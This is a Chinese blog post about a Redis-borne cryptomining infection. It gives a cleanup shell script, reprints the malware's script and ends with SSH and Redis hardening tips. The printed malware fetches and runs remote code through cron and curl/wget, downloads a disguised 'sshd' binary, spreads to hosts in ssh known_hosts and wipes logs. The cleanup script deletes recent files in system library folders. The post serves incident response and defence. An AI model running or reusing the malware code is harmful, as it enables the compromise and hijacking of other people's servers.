起因 这两周写实训项目使用到了redis做缓存服务器,但由于安全意识不够服务器被人种下了挖矿病毒 ,不过还好当时使用的是docker
病毒症状
查杀方法 shell脚本 (脚本参考(https://blog.csdn.net/u010457406/article/details/89328869))
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 #!/bin/bash #可以重复执行几次,防止互相拉起导致删除失败 function installBusyBox(){ #参考第一段 busybox|grep BusyBox |grep v } function banHosts(){ #删除免密认证,防止继续通过ssh进行扩散,后续需自行恢复,可不执行 busybox echo "" > /root/.ssh/authorized_keys busybox echo "" > /root/.ssh/id_rsa busybox echo "" > /root/.ssh/id_rsa.pub busybox echo "" > /root/.ssh/known_hosts busybox echo "" > /root/.ssh/auth #iptables -I INPUT -p tcp --dport 445 -j DROP busybox echo -e "\n0.0.0.0 pastebin.com\n0.0.0.0 thyrsi.com" >> /etc/hosts } function fixCron(){ #修复crontab busybox chattr -i /etc/cron.d/root 2>/dev/null busybox rm -f /etc/cron.d/root busybox chattr -i /var/spool/cron/root 2>/dev/null busybox rm -f /var/spool/cron/root busybox chattr -i /var/spool/cron/tomcat 2>/dev/null busybox rm -f /var/spool/cron/tomcat busybox chattr -i /var/spool/cron/crontabs/root 2>/dev/null busybox rm -f /var/spool/cron/crontabs/root busybox rm -rf /var/spool/cron/tmp.* busybox rm -rf /var/spool/cron/crontabs busybox touch /var/spool/cron/root busybox chattr +i /var/spool/cron/root } function killProcess(){ #修复异常进程 busybox ps -ef | busybox grep -v grep | busybox grep 'kerberods' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9 2>/dev/null busybox ps -ef | busybox grep -v grep | busybox grep 'khugepageds' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9 2>/dev/null busybox ps -ef | busybox grep -v grep | busybox egrep 'ksoftirqds' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9 2>/dev/null busybox ps -ef | busybox grep -v grep | busybox egrep 'kthrotlds' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9 2>/dev/null busybox ps -ef | busybox grep -v grep | busybox egrep 'kpsmouseds' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9 2>/dev/null busybox ps -ef | busybox grep -v grep | busybox egrep 'kintegrityds' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9 2>/dev/null busybox rm -f /tmp/khugepageds busybox rm -f /usr/sbin/kerberods busybox rm -f /usr/sbin/kthrotlds busybox rm -f /usr/sbin/kintegrityds busybox rm -f /usr/sbin/kpsmouseds busybox find /tmp -mtime -4 -type f | busybox xargs busybox rm -rf } function clearLib(){ #修复动态库 busybox rm -f /etc/ld.so.preload busybox rm -f /usr/local/lib/libcryptod.so busybox rm -f /usr/local/lib/libcset.so busybox chattr -i /etc/ld.so.preload 2>/dev/null busybox chattr -i /usr/local/lib/libcryptod.so 2>/dev/null busybox chattr -i /usr/local/lib/libcset.so 2>/dev/null busybox find /usr/local/lib/ -mtime -4 -type f| busybox xargs rm -rf busybox find /lib/ -mtime -4 -type f| busybox xargs rm -rf busybox find /lib64/ -mtime -4 -type f| busybox xargs rm -rf busybox rm -f /etc/ld.so.cache busybox rm -f /etc/ld.so.preload busybox rm -f /usr/local/lib/libcryptod.so busybox rm -f /usr/local/lib/libcset.so busybox rm -rf /usr/local/lib/libdevmapped.so busybox rm -rf /usr/local/lib/libpamcd.so busybox rm -rf /usr/local/lib/libdevmapped.so busybox touch /etc/ld.so.preload busybox chattr +i /etc/ld.so.preload ldconfig } function clearInit(){ #修复异常开机项 #chkconfig netdns off 2>/dev/null #chkconfig –del netdns 2>/dev/null #systemctl disable netdns 2>/dev/null busybox rm -f /etc/rc.d/init.d/kerberods busybox rm -f /etc/init.d/netdns busybox rm -f /etc/rc.d/init.d/kthrotlds busybox rm -f /etc/rc.d/init.d/kpsmouseds busybox rm -f /etc/rc.d/init.d/kintegrityds #chkconfig watchdogs off 2>/dev/null #chkconfig --del watchdogs 2>/dev/null #chkconfig --del kworker 2>/dev/null #chkconfig --del netdns 2>/dev/null } function recoverOk(){ service crond start busybox sleep 3 busybox chattr -i /var/spool/cron/root echo "OK,BETTER REBOOT YOUR DEVICE" } #先停止crontab服务 service crond stop #防止病毒继续扩散 banHosts #清除lib劫持 clearLib #修复crontab fixCron killProcess clearLib killProcess #删除异常开机项 clearInit fixCron recoverOk
查杀完成以后重启服务器,发现过段时间,登陆主机,无论本地还是ssh远程登陆,依然会有病毒进程被拉起,怀疑登陆时加载文件存在问题,逐个排查下列文件:
/etc/profile, ~/.profile, ~/.bash_login, ~/.bash_profile, ~/.bashrc, /etc/bashrc;
病毒分析 病毒恶意代码如下,该病毒不仅加入了系统的定时任务,还kill了一些系统进程
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin mkdir -p /tmp chmod 1777 /tmp echo "* * * * * (curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh" | crontab - ps -ef|grep -v grep|grep hwlh3wlh44lh|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep Circle_MI|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep get.bi-chi.com|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep hashvault.pro|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep nanopool.org|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep /usr/bin/.sshd|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep /usr/bin/bsd-port|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "xmr"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "xig"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "ddgs"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "qW3xT"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "wnTKYg"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "t00ls.ru"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "sustes"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "thisxxs"|awk '{print $2}' | xargs kill -9 ps -ef|grep -v grep|grep "hashfish"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "kworkerds"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "/tmp/devtool"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "systemctI"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "sustse"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "axgtbc"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "axgtfa"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "6Tx3Wq"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "dblaunchs"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "/boot/vmlinuz"|awk '{print $2}'|xargs kill -9 cd /tmp touch /usr/local/bin/writeable && cd /usr/local/bin/ touch /usr/libexec/writeable && cd /usr/libexec/ touch /usr/bin/writeable && cd /usr/bin/ rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable export PATH=$PATH:$(pwd) if [ ! -f "/tmp/.XImunix" ] || [ ! -f "/proc/$(cat /tmp/.XImunix)/io" ]; then chattr -i sshd rm -rf sshd ARCH=$(uname -m) if [ ${ARCH}x = "x86_64x" ]; then (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL img.sobot.com/chatres/89/msg/20190606/35c4e7c12f6e4f7f801acc86af945d9f.png -o sshd||wget --timeout=30 --tries=3 -q img.sobot.com/chatres/89/msg/20190606/35c4e7c12f6e4f7f801acc86af945d9f.png -O sshd||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL res.cloudinary.com/dqawrdyv5/raw/upload/v1559818933/x64_p0bkci -o sshd||wget --timeout=30 --tries=3 -q res.cloudinary.com/dqawrdyv5/raw/upload/v1559818933/x64_p0bkci -O sshd||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL cdn.xiaoduoai.com/cvd/dist/fileUpload/1559819210520/7.150351516641309.jpg -o sshd||wget --timeout=30 --tries=3 -q cdn.xiaoduoai.com/cvd/dist/fileUpload/1559819210520/7.150351516641309.jpg -O sshd) && chmod +x sshd else (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL img.sobot.com/chatres/89/msg/20190606/5fb4627f8ee14557a34697baf8843dfe.png -o sshd||wget --timeout=30 --tries=3 -q img.sobot.com/chatres/89/msg/20190606/5fb4627f8ee14557a34697baf8843dfe.png -O sshd||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL res.cloudinary.com/dqawrdyv5/raw/upload/v1559818942/x32_xohyv5 -o sshd||wget --timeout=30 --tries=3 -q res.cloudinary.com/dqawrdyv5/raw/upload/v1559818942/x32_xohyv5 -O sshd||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL cdn.xiaoduoai.com/cvd/dist/fileUpload/1559819246800/1.8800013111270863.jpg -o sshd||wget --timeout=30 --tries=3 -q cdn.xiaoduoai.com/cvd/dist/fileUpload/1559819246800/1.8800013111270863.jpg -O sshd) && chmod +x sshd fi $(pwd)/sshd || /usr/bin/sshd || /usr/libexec/sshd || /usr/local/bin/sshd || sshd || ./sshd || /tmp/sshd || /usr/local/sbin/sshd fi if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh >/dev/null 2>&1 &' & done fi for file in /home/* do if test -d $file then if [ -f $file/.ssh/known_hosts ] && [ -f $file/.ssh/id_rsa.pub ]; then for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" $file/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh >/dev/null 2>&1 &' & done fi fi done echo 0>/var/spool/mail/root echo 0>/var/log/wtmp echo 0>/var/log/secure echo 0>/var/log/cron #
感染途径:这里感染挖矿病毒主要是由于redis未授权访问导致的,当然还可能是通过ssh服务爆破的
安全防护
SSH 谨慎做免密登录 尽量不使用默认的22端口 增强root密码强度
Redis 增加授权认证(requirepass参数) 尽量使用docker版本(docker pull redis) 隐藏重要的命令